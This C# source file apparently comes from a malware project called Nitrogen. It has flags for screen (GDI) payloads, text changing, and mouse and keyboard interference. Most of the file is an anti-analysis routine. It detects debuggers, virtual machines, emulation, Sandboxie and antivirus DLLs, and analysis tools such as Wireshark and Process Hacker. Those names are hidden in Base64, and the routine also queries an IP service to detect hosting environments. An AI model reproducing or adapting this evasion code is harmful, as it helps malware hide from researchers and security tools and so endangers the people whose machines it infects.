using System; using System.Diagnostics; using System.Linq; using System.Management; using System.Net; using System.Reflection; using System.Text; using System.Threading; using static Nitrogen.Dll_Imports; namespace Nitrogen { internal class variables { public static bool gdi_payloads = true; public static bool window_shake = false; public static bool textchanger = true; //public static bool drawcursor = false; public static bool mouse = false; public static bool keyboard = false; public static bool iconmove = false; public static bool sounds = true; public static bool extreme = false; public static bool AlreadyRunning() { Process[] processes = Process.GetProcesses(); Process currentProcess = Process.GetCurrentProcess(); foreach (Process process in processes) { try { if (process.Modules[0].FileName == Assembly.GetExecutingAssembly().Location && currentProcess.Id != process.Id) { return true; } } catch { } } return false; } private static bool IsDebuggerAttached() { bool flag = false; bool result; try { CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref flag); result = flag; } catch { result = false; } return result; } private static bool IsVirtualMachine() { using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) { try { using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get()) { foreach (ManagementBaseObject managementBaseObject in managementObjectCollection) { if ((managementBaseObject["Manufacturer"].ToString().ToLower() == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || managementBaseObject["Manufacturer"].ToString().ToLower().Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox") { return true; } } } } catch { return true; } } foreach (ManagementBaseObject managementBaseObject2 in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController").Get()) { if (managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VMware") && managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VBox")) { return true; } } return false; } private static bool IsEmulated() { try { long ticks = DateTime.Now.Ticks; Thread.Sleep(10); if (DateTime.Now.Ticks - ticks < 10L) { return true; } } catch { } return false; } private static bool IsSandBoxie() { string[] array = new string[] { Encoding.UTF8.GetString(Convert.FromBase64String("U2JpZURsbC5kbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("U3hJbi5kbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2YyLmRsbA==")), Encoding.UTF8.GetString(Convert.FromBase64String("c254aGsuZGxs")), Encoding.UTF8.GetString(Convert.FromBase64String("Y21kdnJ0MzIuZGxs")) }; for (int i = 0; i < array.Length; i++) { if (GetModuleHandle(array[i]).ToInt32() != 0) { return true; } } return false; } private static bool IsBlacklistedProcessesRunning() { Process[] processes = Process.GetProcesses(); string[] source = new string[] { Encoding.UTF8.GetString(Convert.FromBase64String("cHJvY2Vzc2hhY2tlcg==")), Encoding.UTF8.GetString(Convert.FromBase64String("bmV0c3RhdA==")), Encoding.UTF8.GetString(Convert.FromBase64String("bmV0bW9u")), Encoding.UTF8.GetString(Convert.FromBase64String("dGNwdmlldw==")), Encoding.UTF8.GetString(Convert.FromBase64String("d2lyZXNoYXJr")), Encoding.UTF8.GetString(Convert.FromBase64String("ZmlsZW1vbg==")), Encoding.UTF8.GetString(Convert.FromBase64String("cmVnbW9u")), Encoding.UTF8.GetString(Convert.FromBase64String("Y2Fpbg==")) }; foreach (Process process in processes) { if (source.Contains(process.ProcessName.ToLower())) { return true; } } return false; } private static bool IsHosted() { try { return new WebClient().DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cDovL2lwLWFwaS5jb20vbGluZS8/ZmllbGRzPWhvc3Rpbmc="))).Contains("true"); } catch { } return false; } public static bool IsAnalyzed() { return IsHosted() || IsSandBoxie() || IsVirtualMachine() ||IsDebuggerAttached() || IsEmulated() || IsBlacklistedProcessesRunning(); } } }